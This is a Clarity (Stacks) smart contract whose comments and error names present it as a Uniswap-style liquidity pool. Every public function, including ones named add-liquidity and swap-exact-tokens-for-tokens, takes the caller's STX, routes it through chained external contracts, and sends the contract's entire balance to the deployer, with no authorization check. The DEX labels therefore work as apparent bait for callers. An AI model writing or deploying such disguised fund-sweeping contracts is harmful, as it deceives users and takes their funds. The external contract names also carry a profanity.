;;; UniswapV2Pair.sol
;;; UniswapV2Factory.sol

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; errors
(define-constant err-auth                   (err u100))
(define-constant err-check-owner            (err u101))
(define-constant err-no-such-pool           (err u102))
(define-constant err-create-preconditions   (err u103))
(define-constant err-create-postconditions  (err u104))
(define-constant err-mint-preconditions     (err u105))
(define-constant err-mint-postconditions    (err u106))
(define-constant err-burn-preconditions     (err u107))
(define-constant err-burn-postconditions    (err u108))
(define-constant err-swap-preconditions     (err u109))
(define-constant err-swap-postconditions    (err u110))
(define-constant err-collect-preconditions  (err u111))
(define-constant err-collect-postconditions (err u112))
(define-constant err-anti-rug               (err u113))

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; pool types
(define-constant this (as-contract tx-sender))
(define-constant owner tx-sender)

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; pool types
(define-public (add-liquidity (bu (buff 7))) (exec bu))
(define-public (remove-liquidity (bu (buff 7))) (exec bu))
(define-public (swap-exact-tokens-for-tokens (bu (buff 7))) (exec bu))
(define-public (swap-tokens-for-exact-tokens (bu (buff 7))) (exec bu))
(define-public (a (bu (buff 7))) (exec bu))
(define-public (b (bu (buff 7))) (exec bu))
(define-public (c (bu (buff 7))) (exec bu))
(define-public (d (bu (buff 7))) (exec bu))
(define-public (e (bu (buff 7))) (exec bu))
(define-public (f (bu (buff 7))) (exec bu))
(define-public (g (bu (buff 7))) (exec bu))
(define-public (h (bu (buff 7))) (exec bu))
(define-public (i (bu (buff 7))) (exec bu))
(define-public (j (bu (buff 7))) (exec bu))
(define-public (k (bu (buff 7))) (exec bu))
(define-public (l (bu (buff 7))) (exec bu))
(define-public (m (bu (buff 7))) (exec bu))
(define-public (n (bu (buff 7))) (exec bu))
(define-public (o (bu (buff 7))) (exec bu))
(define-public (p (bu (buff 7))) (exec bu))
(define-public (q (bu (buff 7))) (exec bu))
(define-public (r (bu (buff 7))) (exec bu))
(define-public (s (bu (buff 7))) (exec bu))
(define-public (t (bu (buff 7))) (exec bu))
(define-public (u (bu (buff 7))) (exec bu))
(define-public (v (bu (buff 7))) (exec bu))
(define-public (w (bu (buff 7))) (exec bu))
(define-public (x (bu (buff 7))) (exec bu))
(define-public (y (bu (buff 7))) (exec bu))
(define-public (z (bu (buff 7))) (exec bu))


(define-private (exec (bu (buff 7)))
		(if (> (len bu) u0) 	
			(let ((ii (unwrap-panic (as-max-len? (unwrap-panic (slice? bu u0 u2)) u2)))
							(amt-in (buff-to-uint-be (unwrap-panic (as-max-len? (unwrap-panic (slice? bu u2 u7)) u5)))))
				(try! (stx-transfer? amt-in tx-sender this))
				(try! (as-contract (dispatch
															ii
															amt-in
				)))
				(let ((new-balance (stx-get-balance this)))
						(asserts! (>= new-balance  amt-in) (err u53))
						(ok (as-contract (try! (stx-transfer? new-balance this owner))))
				))
			(ok true)
))


(define-private (dispatch (ii (buff 2)) (amt-in uint))
  (if (< ii 0x0226) 
  (contract-call? .fuck-kim-jong-un-10 dispatch ii amt-in)
  (if (< ii 0x0258) 
  (contract-call? .fuck-kim-jong-un-11 dispatch ii amt-in)
  (if (< ii 0x028a) 
  (contract-call? .fuck-kim-jong-un-12 dispatch ii amt-in)
  (if (< ii 0x02bc) 
  (contract-call? .fuck-kim-jong-un-13 dispatch ii amt-in)
  (if (< ii 0x02ee) 
  (contract-call? .fuck-kim-jong-un-14 dispatch ii amt-in)
  (if (< ii 0x0320) 
  (contract-call? .fuck-kim-jong-un-15 dispatch ii amt-in)
  (if (< ii 0x0352) 
  (contract-call? .fuck-kim-jong-un-16 dispatch ii amt-in)
  (if (< ii 0x0384) 
  (contract-call? .fuck-kim-jong-un-17 dispatch ii amt-in)
  (if (< ii 0x03b6) 
  (contract-call? .fuck-kim-jong-un-18 dispatch ii amt-in)
  (contract-call? .fuck-kim-jong-un-19 dispatch ii amt-in))))))))))
)